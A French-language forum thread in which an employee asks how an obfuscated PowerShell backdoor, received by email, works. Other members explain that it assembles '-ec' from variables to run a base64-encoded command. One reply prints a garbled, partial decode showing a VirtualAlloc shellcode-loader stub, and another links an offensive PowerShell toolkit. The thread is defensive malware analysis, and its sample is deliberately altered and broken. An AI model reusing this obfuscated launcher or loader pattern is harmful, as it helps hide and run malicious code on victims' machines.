Discussion :

[Lekno]

Bonjour à tous, j'ai récupéré une backdoor envoyé par email à certain de nos collaborateurs. Par curiosité je tente de comprendre son fonctionnement. Seulement je ne parviens pas a comprendre comment fonctionne celle-ci, j'ai volontairement édité la data encodé la backdoor est non utilisable en l'état, je souhaite simplement comprendre les options

Code bash :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
powershell -w 1 -C "sv NJ -;sv lr ec;sv hW ((gv NJ).value.toString()+(gv lr).value.toString());powershell (gv hW).value.toString() 'JAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAG'"

J'ai pré-remplis les lignes que je peux traduire, le reste m'est inconnu et rien dans la doc officiel powershell (ou pas les bons keywords?)

• powershell : Appel executable powershell
• -w 1 : Affichage de la fenêtre powershell
• -C sv NJ -; : -C pour command sv pour Set-Variable
• sv lr ec;
• sv hW ((gv NJ).value.toString()+(gv lr).value.toString())
• powershell : Appel executable powershell
• (gv hW).value.toString()

[6ratgus]

salut Lekno

Bonjour à tous, j'ai récupéré une backdoor envoyé par email à certain de nos collaborateurs. Par curiosité je tente de comprendre son fonctionnement. Seulement je ne parviens pas a comprendre comment fonctionne celle-ci, je souhaite simplement comprendre les options

J'ai pré-remplis les lignes que je peux traduire, le reste m'est inconnu et rien dans la doc officiel powershell (ou pas les bons keywords?)

je complète ta liste

• powershell : Appel executable powershell
• -w 1 : Affichage de la fenêtre powershell
• -C sv NJ -; : -C pour command sv pour Set-Variable
• sv lr ec; : sv pour Set-Variable la variable lr va contenir ec
• sv hW ((gv NJ).value.toString()+(gv lr).value.toString()) : gv pour Get-Variable la variable HW va contenir -ec
• powershell (gv hW).value.toString() : Appel executable PowerShell ; gv pour Get-Variable avec le paramètre -ec soit -EncodedCommand
• 'JAB5.....AG' code en base 64 qui va être exécuté par PowerShell

-EncodedCommand
Accepte une version de chaîne codée en base 64 d’une commande. Utilisez
ce paramètre pour envoyer des commandes à Windows PowerShell nécessitant
des guillemets complexes ou des accolades.

voici le code décodé en UTF-7
je suppose que l'orignal est plus intéressent :

Code powershell :

Sélectionner tout - Visualiser dans une fenêtre à part

$yQb = '$fXs = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddrb@ p@`0pp@ @ P P0 @ P 00@@0P@P @@ ` @P0@@ @@ $yQb = '$fXs = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddrb@ p@`0pp@ @ P P0 @ P 00@@0P@P @@ ` @P0@@ @@ $yQb = '$fXs = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddrb@ p@`0pp@ @ P P0 @ P 00@@0P@P @@ ` @P0@@ @@ $yQb = '$fXs = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddrb@ p@`0pp@ @ P P0 @ P 00@@0P@P @@ ` @P0@@ @@ $yQb = '$fXs = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddrb@ p@`0pp@ @ P P0 @ P 00@@0P@P @@ ` @P0@@ @@

[Lekno]

merci pour ton retour, j'ai decode le code original en UTF-8 comme tu me l'as montré, ca reste pas évident à comprendre comme process, ca ressemble à de l'injection "brute" directement dans des DLL, si tu as des liens qui pourrai m'aider à comprendre ca. Je passe en résolu

[sachadee]

Bonjour à tous, j'ai récupéré une backdoor envoyé par email à certain de nos collaborateurs. Par curiosité je tente de comprendre son fonctionnement. Seulement je ne parviens pas a comprendre comment fonctionne celle-ci, j'ai volontairement édité la data encodé la backdoor est non utilisable en l'état, je souhaite simplement comprendre les options

Code bash :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
powershell -w 1 -C "sv NJ -;sv lr ec;sv hW ((gv NJ).value.toString()+(gv lr).value.toString());powershell (gv hW).value.toString() 'JAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGJAB5AFEAYgAgAD0AIAAnACQAZgBYAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAG'"

J'ai pré-remplis les lignes que je peux traduire, le reste m'est inconnu et rien dans la doc officiel powershell (ou pas les bons keywords?)

• powershell : Appel executable powershell
• -w 1 : Affichage de la fenêtre powershell
• -C sv NJ -; : -C pour command sv pour Set-Variable
• sv lr ec;
• sv hW ((gv NJ).value.toString()+(gv lr).value.toString())
• powershell : Appel executable powershell
• (gv hW).value.toString()

Sans le code complet c'est compliqué à definir ce que ça faît !

Mais si c'est un backdoor ça va te permettre d'ouvrir une porte par un petit serveur ! qui va permettre de prendre le controle de ton calculateur,rien de bien compliqué.

Je vois pas pas pourquoi tu cherches à cacher le plus important !

Enfin pour ceux que ça interesse :

https://github.com/samratashok/nishang

[Lekno]

Tout simplement parce que cela fait partie des règles du forum, je ne souhaite pas diffuser de manière publique le code, j'ai eu contact avec d'autres membres pour une étude plus poussée du code originale via MP

Y'a de l'assembleur ca devient trop compliqué pour moi

Je passe en résolu